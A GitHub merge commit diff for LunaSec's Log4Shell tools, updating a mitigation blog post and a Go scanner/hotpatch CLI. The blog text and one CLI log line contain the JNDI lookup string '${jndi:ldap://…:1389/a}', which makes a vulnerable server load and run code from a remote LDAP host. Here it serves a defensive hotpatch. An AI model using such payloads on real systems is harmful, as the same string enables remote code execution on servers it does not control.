Merge branch 'master' into hotpatch-improvements

lunasec-io · Dec 15, 2021 · ee9655e · ee9655e
2 parents 02f39cf + f92099d
commit ee9655e
Show file tree

Hide file tree

Showing 8 changed files with 90 additions and 12 deletions.
diff --git a/docs/blog/2021-12-12-log4j-zero-day-mitigation-guide.mdx b/docs/blog/2021-12-12-log4j-zero-day-mitigation-guide.mdx
@@ -54,7 +54,7 @@ earlier blog post](https://www.lunasec.io/docs/blog/log4j-zero-day/).
 :::
 <!--truncate-->
 
-_Originally Posted @ December 12th & Last Updated @ December 14th, 4:43pm PST_
+_Originally Posted @ December 12th & Last Updated @ December 14th, 7:37pm PST_
 
 ## Be careful what Log4Shell advice you trust online
 
@@ -80,7 +80,7 @@ It works by scanning for hashes of [known vulnerable log4j classes](https://gith
 If you have a vulnerable version of a log4j in your built Java project, the hash will match a one
 of the hashes in the list.
 
-**[Download from GitHub](https://github.com/lunasec-io/lunasec/releases/tag/v1.0.0-log4shell)**
+**[Download from GitHub](https://github.com/lunasec-io/lunasec/releases/)**
 
 _Make sure you download the right version for your Operating System and CPU architecture._ Once downloaded, you can extract
 it and run the `log4shell` command in your terminal.  The tool can scan individual files or whole directories.
@@ -296,15 +296,26 @@ to a running container. This could be useful for containerized vendor software.
 [This guide](https://medium.com/@edeNFed/patching-log4shell-in-one-command-without-downtime-using-ephemeral-containers-c69a9155ab1e) 
 explains how to apply the patch.
 
-### Option 4: Remote hot patch / LogOut4Shell
+### Option 4: Remote hot patch (for live servers)
 Because of the extensive control Log4Shell gives an attacker, it's actually possible to use the bug against itself to patch a running server.
 This isn't the recommended strategy for various reasons, but it could be a last resort for systems that you can't easily restart or modify.  Note that doing this on a system 
 you don't have permission to is most likely illegal. The fix will only work until the server (or the JVM) is restarted.
 
-How to accomplish this is explained in [this guide](https://github.com/Cybereason/Logout4Shell).
+**Update:** We have added this functionality to the [latest release](https://github.com/lunasec-io/lunasec/releases) of our Log4Shell CLI tool.
 
-We are currently adding this functionality to our CLI. 
-[Subscribe below](#stay-in-the-loop) to be alerted when it's live.
+You may also use our hosted version here to patch yourself:
+```
+${jndi:ldap://hotpatch.log4shell.com:1389/a}
+```
+
+Just simply paste that anywhere into your server where you're vulnerable, and it will work. (For example, in the `main` function when you start up your server)
+
+:::warning Not permanent solution!
+
+Please do not rely on this forever (in case our site ever goes down). This should only be used as a stop-gap solution until you can apply a more permanent patch for Log4Shell.
+:::
+
+How it works and how to accomplish it manually is explained in [this guide](https://github.com/Cybereason/Logout4Shell). Our implementation is based on the work they did.
 
 ## How to protect yourself from future 0-days
 
@@ -454,3 +465,4 @@ If you would like to contribute, or notice any errors, this post is an Open Sour
 4. Add warnings about limited vuln in 2.15 / noMsgFormatLookups
 5. Add additional disclaimer about %m.
 6. Added link to 2nd CVE info.
+7. Added info about hot patching, and links to new releases.
diff --git a/tools/log4shell/.goreleaser.yml b/tools/log4shell/.goreleaser.yml
@@ -12,12 +12,14 @@ builds:
       - windows
       - darwin
 archives:
-  - replacements:
+  - format: binary
+    replacements:
       darwin: Darwin
       linux: Linux
       windows: Windows
       386: i386
       amd64: x86_64
+
 checksum:
   name_template: 'checksums.txt'
 snapshot:

diff --git a/tools/log4shell/constants/colorize.go b/tools/log4shell/constants/colorize.go
@@ -0,0 +1,32 @@
+// Copyright 2021 by LunaSec (owned by Refinery Labs, Inc)
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+package constants
+
+type TerminalColor int
+
+const (
+	ColorBlack TerminalColor = iota + 30
+	ColorRed
+	ColorGreen
+	ColorYellow
+	ColorBlue
+	ColorMagenta
+	ColorCyan
+	ColorWhite
+
+	ColorBold     = 1
+	ColorDarkGray = 90
+)
+
diff --git a/tools/log4shell/constants/version.go b/tools/log4shell/constants/version.go
@@ -14,4 +14,4 @@
 //
 package constants
 
-const Version = "1.1.0"
+const Version = "1.1.1"
diff --git a/tools/log4shell/main.go b/tools/log4shell/main.go
@@ -45,7 +45,12 @@ func enableGlobalFlags(c *cli.Context) {
 	jsonFlag := c.Bool("json")
 	if !jsonFlag {
 		// pretty print output to the console if we are not interested in parsable output
-		log.Logger = log.Output(zerolog.ConsoleWriter{Out: os.Stderr})
+		consoleOutput := zerolog.ConsoleWriter{Out: os.Stderr}
+		consoleOutput.FormatFieldName = func(i interface{}) string {
+			return fmt.Sprintf("\n\t%s: ", util.Colorize(constants.ColorBlue, i))
+		}
+		log.Logger = log.Output(consoleOutput)
+
 	}
 }
 
@@ -117,7 +122,7 @@ func hotpatchCommand(c *cli.Context) error {
 
 	log.Info().
 		Msg("Starting Log4Shell hotpatch LDAP and payload servers")
-
+	log.Info().Msgf("Once both servers have started, use payload string: '${jndi:ldap://%s:1389/a}' to hotpatch", ip)
 	hotpatchServer.Start()
 	hotpatchPayloadServer.Start()
 

diff --git a/tools/log4shell/patch/hotpatch.go b/tools/log4shell/patch/hotpatch.go
@@ -59,7 +59,7 @@ func (s *HotpatchLDAPServer) Start() {
 
 		log.Info().
 			Str("addr", addr).
-			Msg("starting hotpatch server")
+			Msg("Started hotpatch server")
 
 		err := s.server.ListenAndServe(addr)
 		if err != nil {
@@ -68,6 +68,7 @@ func (s *HotpatchLDAPServer) Start() {
 				Msg("unable to start ldap server")
 			panic(err)
 		}
+		log.Info().Msg("HotPatch Server Started")
 	}()
 }
 

diff --git a/tools/log4shell/patch/payloadserver.go b/tools/log4shell/patch/payloadserver.go
@@ -89,7 +89,7 @@ func (s *HotpatchPayloadServer) Start() {
 
 		log.Info().
 			Str("addr", addr).
-			Msg("starting hotpatch payload server")
+			Msg("Started hotpatch payload server")
 
 		err := http.ListenAndServe(addr, nil)
 		if err != nil {

diff --git a/tools/log4shell/util/colorize.go b/tools/log4shell/util/colorize.go
@@ -0,0 +1,26 @@
+// Copyright 2021 by LunaSec (owned by Refinery Labs, Inc)
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+package util
+
+import (
+	"fmt"
+	"github.com/lunasec-io/lunasec/tools/log4shell/constants"
+)
+
+// colorize returns the string s wrapped in ANSI code c, unless disabled is true.
+func Colorize(c constants.TerminalColor, s interface{}) string {
+	return fmt.Sprintf("\x1b[%dm%v\x1b[0m", c, s)
+}